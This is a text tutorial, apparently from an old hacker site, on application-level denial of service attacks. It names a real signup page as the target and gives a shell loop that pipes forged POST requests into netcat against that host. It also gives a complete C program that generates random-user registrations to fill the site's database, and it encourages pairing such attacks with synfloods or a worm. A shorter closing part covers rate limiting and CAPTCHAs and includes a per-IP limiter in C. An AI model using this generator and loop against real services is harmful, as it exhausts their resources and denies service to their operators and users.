-------- "How to perform application level Denial of Service attacks" ---------
------------------------------- Version 0.2 -----------------------------------
----------------------- http://www.priestmaster.org ---------------------------
-------------------------<priest@priestmaster.org> ----------------------------

!!! THIS FILE IS FOR EDUCATIONAL PURPOSE ONLY AND SHOULD NOT BE USED TO !!!
!!! ATTACK COMPUTERS WITHOUT PERMISSION FROM THE SYSTEM ADMINISTRATOR.  !!!


* Legend:
  > is input
  < is output
  * is new chapter


* What is an application level Denial of service Attack ?

  Application level DoS attacks are like normal DoS attacks, but aimed at
  the application layer: databases, the HTTP protocol, CGI scripts and all
  other application layer stuff. Instead of flooding the link, they make
  the application itself burn CPU time, disk space or database space.
  A good paper about the theory of application layer DoS is at [1].
  This paper covers some real attack methods.


* What do we need to perform such attacks ?

  Some understanding of HTTP/CGI, SQL, a programming language, shell
  scripting, the netcat utility (see [2]) and a sniffer (see [3]).
  I use the C programming language, bash scripting, tethereal and a Linux
  operating system, but you can attack from any operating system that has
  a compiler/interpreter, netcat and a sniffer (Cygwin for Windows, or
  ActivePerl, netcat and Ethereal make a good platform if you use Windows).


* Ways to fill up the remote database

  Every user-supplied value which is stored in a database or written to a
  file is a point to attack. If you get a popup or form which asks you a
  question, you can send many automated entries, for example (sometimes it
  is possible to manipulate a voting system or a lottery this way). Search
  for HTTP GET and POST requests which send user supplied data to the
  webserver/database. I found an example at http://mind.sputnik.pl/new-user.
  Surf to this page with your browser, switch to another terminal and launch
  a sniffer (I use the terminal based sniffer from the ethereal package,
  tethereal, see [3], because tcpdump -w won't work on my computer):

  > tethereal -i ppp0 -w dump  
  
  Now switch to your browser and enter a valid email and password. Switch
  back to the tethereal terminal, stop the capture (Ctrl-C) and list the
  HTTP POST request:

  > strings dump

  ...
  < POST /new-user HTTP/1.0
  < Host: mind.sputnik.pl
  < Accept: text/html, text/plain, application/x-gunzip, application/x-gzip, applica
  < Accept-Encoding: gzip, compress
  < Accept-Language: en
  < Pragma: no-cache
  < Cache-Control: no-cache
  < User-Agent: Lynx/2.8.3dev.9 libwww-FM/2.14
  < Referer: http://mind.sputnik.pl/new-user
  < Content-type: application/x-www-form-urlencoded
  < Content-length: 69
  <
  < email=bernd@brot.de&password=geheim&repeat_password=geheim&stage=save
  ...

  If you send this POST request again, you try to create a new user, but
  bernd@brot.de already exists, because we created it before. You need
  another name for your next account. So we need a program which creates
  automated POST requests with random usernames and passwords, and a
  function which calculates the Content-length for each new body (the
  length in bytes of the URL-encoded body after the empty line), to fill
  up the database with many fake users. userfillup.c in this package is an
  example program against mind.sputnik.pl which generates POST requests
  with random usernames and passwords. We can send these POST requests with
  netcat automatically and many times (see userdos.sh, which starts the DoS
  attack against mind.sputnik.pl):

  > cat userdos.sh

  < #!/bin/sh
  < while /bin/true
  < do
  < ./userfillup | netcat mind.sputnik.pl 80
  < done

  DoSing mind.sputnik.pl is really easy, because we only need one POST
  request to create a new user. Normally you need more complex handling
  (you have to set a cookie, pass some questions, walk through several
  forms, wait for a timeout, ...), but if you can do it with your web
  browser, you can also do it automated.
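  The request generator described above, as an added example (this is not
  the userfillup.c shipped with the paper, which is not reproduced here).
  It takes the host, path and field names from the sniffed request, builds
  the body for a random user, and derives Content-length from the real
  byte count of that body, which is the step a hand-edited request gets
  wrong. The 8-letter random names, the brot.de domain taken from the
  capture, and the reduced header set are assumptions of this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

/* Host and path as seen in the sniffed POST; everything else below is an
   assumption of this example, not the paper's userfillup.c. */
static const char *TARGET_HOST = "mind.sputnik.pl";
static const char *TARGET_PATH = "/new-user";

/* Fill buf with len random lowercase letters, NUL-terminated.
   Only [a-z] is used so the body needs no percent-encoding. */
static void random_word(char *buf, size_t len) {
    static const char alphabet[] = "abcdefghijklmnopqrstuvwxyz";
    for (size_t i = 0; i < len; i++)
        buf[i] = alphabet[rand() % (sizeof(alphabet) - 1)];
    buf[len] = '\0';
}

/* Build the URL-encoded body for one user. Returns the number of bytes
   written (without the NUL), which is exactly the Content-length value,
   or -1 if the buffer is too small. All inputs must already be URL-safe;
   if you add characters that need %XX encoding, encode first and count
   the encoded bytes. */
int build_body(char *out, size_t outsz, const char *user,
               const char *domain, const char *password) {
    int n = snprintf(out, outsz,
                     "email=%s@%s&password=%s&repeat_password=%s&stage=save",
                     user, domain, password, password);
    if (n < 0 || (size_t)n >= outsz) return -1;
    return n;
}

/* Build the complete HTTP/1.0 request (headers + blank line + body).
   HTTP/1.0 makes the server close the connection after its answer, so
   netcat exits and a shell loop can start the next request. */
int build_request(char *out, size_t outsz, const char *body, int body_len) {
    int n = snprintf(out, outsz,
                     "POST %s HTTP/1.0\r\n"
                     "Host: %s\r\n"
                     "User-Agent: Lynx/2.8.3dev.9 libwww-FM/2.14\r\n"
                     "Content-type: application/x-www-form-urlencoded\r\n"
                     "Content-length: %d\r\n"
                     "\r\n"
                     "%s",
                     TARGET_PATH, TARGET_HOST, body_len, body);
    if (n < 0 || (size_t)n >= outsz) return -1;
    return n;
}

/* One request for a freshly generated random user. Returns its length. */
int random_user_request(char *out, size_t outsz) {
    char user[9], pass[9], body[256];
    random_word(user, 8);
    random_word(pass, 8);
    int blen = build_body(body, sizeof body, user, "brot.de", pass);
    if (blen < 0) return -1;
    return build_request(out, outsz, body, blen);
}

int main(void) {
    char req[512];
    srand((unsigned)time(NULL));
    int n = random_user_request(req, sizeof req);
    if (n < 0) return 1;
    /* usage, like userdos.sh:  ./gen_user | netcat mind.sputnik.pl 80 */
    fwrite(req, 1, (size_t)n, stdout);
    return 0;
}
```

  Fed the values from the capture (bernd, brot.de, geheim), build_body
  returns 69, the same Content-length the browser sent, which is the quick
  way to check that a generator reproduces the sniffed request before you
  point it at a server.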


* Generic Apl. DoS attacks

  You can call procedures in CGI scripts (very often, or endlessly) which
  do complex mathematics or any other work that takes much CPU time
  (cryptography, for example). Often you can trigger conditions like an
  endless loop or a segfault with a specially crafted packet (search for
  DoS exploits with google: |"DoS exploit" site:packetstormsecurity.org|
  (only use the string between | and |)). If user data is written to a
  file, you can eat up disk space. Be creative. If you can't gain access
  to a computer, simply DoS it. DoS attacks are nearly always possible.


* How to prevent such attacks ?

  1. Rate-limit requests: delay the response when many requests come
     from the same IP address within a short time (webserver).
  2. Do not store too much data from the same IP address (session IDs,
     usernames, ...).
  3. Do not store too many cookie values from one IP in the database.
  4. Graphical banners which contain distorted characters that the user
     has to type in (a CAPTCHA), so that automation is not possible (it
     is sometimes still possible with OCR systems).
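  Points 2 and 3 above amount to one check on the server side: before a
  new user, session or cookie value is stored, count how many entries the
  same source address has created recently and refuse once a limit is hit.
  The following is an added example of that check, not code from the
  paper or from any webserver. The table size, the limit of 5 entries and
  the one hour sliding window are assumptions; addresses are passed as
  host-order IPv4 integers.

```c
#include <stdint.h>
#include <string.h>
#include <time.h>

/* Per-source-IP limit on how many entries (accounts, sessions, cookies)
   one address may create inside a sliding window.  All three constants
   are assumptions of this example. */
#define MAX_SOURCES  1024   /* distinct IPs tracked at once            */
#define MAX_ENTRIES  5      /* entries allowed per IP inside the window */
#define WINDOW_SECS  3600   /* sliding window length in seconds         */

struct source {
    uint32_t ip;
    time_t   stamps[MAX_ENTRIES]; /* times of recent accepted entries   */
    int      count;               /* valid slots in stamps[]            */
};

static struct source table[MAX_SOURCES];
static int used = 0;

/* Find the record for ip, creating one if the table has room. */
static struct source *lookup(uint32_t ip) {
    for (int i = 0; i < used; i++)
        if (table[i].ip == ip) return &table[i];
    if (used == MAX_SOURCES) return NULL;       /* table full */
    struct source *s = &table[used++];
    memset(s, 0, sizeof *s);
    s->ip = ip;
    return s;
}

/* Drop timestamps that have left the window. */
static void expire(struct source *s, time_t now) {
    int kept = 0;
    for (int i = 0; i < s->count; i++)
        if (now - s->stamps[i] < WINDOW_SECS)
            s->stamps[kept++] = s->stamps[i];
    s->count = kept;
}

/* Returns 1 if ip may create another entry at time now (and records it),
   0 if the per-IP limit is reached and the request should be refused or
   delayed.  When the tracking table is full we fail closed: an attacker
   who fills the table must not thereby switch the limit off. */
int allow_entry(uint32_t ip, time_t now) {
    struct source *s = lookup(ip);
    if (!s) return 0;
    expire(s, now);
    if (s->count >= MAX_ENTRIES) return 0;
    s->stamps[s->count++] = now;
    return 1;
}

/* Forget all sources (for tests, or when the server restarts). */
void reset_limits(void) { used = 0; }
```

  Two caveats a practitioner should keep in mind: many users behind one
  NAT or proxy share an address, so the limit hits them as a group, and a
  limit keyed on the source address is exactly what the next chapter's
  distributed attack gets around, because every attacking host gets its
  own allowance.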


* How to attack webservers which send delayed HTTP responses or which
  only store a few entries per IP address?

  If the delay is client-based (JScript, JavaScript, ...), it's worthless,
  because you do not interpret the script code if you send raw GET and
  POST requests. Apl. DoS attacks (and normal DoS attacks) are more
  effective if you have many computers with different IP addresses which
  all attack one destination, because per-IP limits are applied to each
  attacking host separately. You can combine Apl. DoS with normal DoS
  attacks (synflood, the Rose fragmentation attack, ...) or write a
  computer worm which performs the attacks automatically.


* Conclusion

  Apl. level DoS attacks are very effective because you don't need very
  much bandwidth. A single specially crafted packet, or resending some
  user data many times, is enough to cause damage, and it is really
  difficult (or impossible?) to protect against all types of DoS attacks.
  If you have fair comments or you find some mistakes (there are many in
  this paper), mail me <priest@priestmaster.org>. I'm from Austria and I
  cannot write English very well. I hope you understand me and the basic
  concepts of Apl. DoS exploitation (after you have read this paper).
  

-----------------------------------------------------------------------------

* Links

  [1] Theoretical paper about application level DoS attacks
      http://packetstormsecurity.org/papers/attack/ApplicationLevelDoSAttacksv06.pdf

  [2] Netcat and many other good utilities
      http://www.atstake.com/research/tools/network_utilities/

  [3] The Ethereal sniffer homepage (tethereal is its terminal version)
      http://www.ethereal.com
